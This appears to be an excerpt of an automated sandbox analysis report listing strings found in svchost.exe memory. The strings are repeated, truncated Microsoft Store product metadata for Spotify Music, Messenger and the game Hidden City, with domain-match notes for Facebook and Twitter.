":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-05T08:18:42.8639720Z\|\|.\|\|dd237c2b-2874-48fe-90b2-f0059c8f0c6d\|\|1152921505693245717\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000016.00000003.400383367.000001DCAE767000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-05T08:18:42.8639720Z\|\|.\|\|dd237c2b-2874-48fe-90b2-f0059c8f0c6d\|\|1152921505693245717\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000016.00000003.400623292.000001DCAE722000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.facebook.com (Facebook)
Source: svchost.exe, 00000016.00000003.400623292.000001DCAE722000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE equals www.twitter.com (Twitter)
Source: svchost.exe, 00000016.00000003.393782565.000001DCAE782000.00000004.00000001.sdmp	String found in binary or memory: t enough.\r\n\r\nSHARE WITH FRIENDS\r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity.\r\n\r\n\r\nCalls are free over Wi-Fi but otherwise standard data charges apply.\r\nPrivacy Policy: https://www.facebook.com/about/privacy \| LEARN MORE at: https://messenger.com (https://messenger.com/)","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-03-02T18:22:42.6875348Z\|\|.\|\|d304cd4c-475a-4125-aa87-5c57cb1f4562\|\|1152921505693241551\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2021-03-02T18:21:36.4242164Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nMADE FOR DESKTOP, MADE
Source: svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000016.00000003.391280165.000001DCAE75B000.00000004.00000001.sdmp	String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000016.00000003.391261125.000001DCAE7BD000.00000004.00000001.sdmp	String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 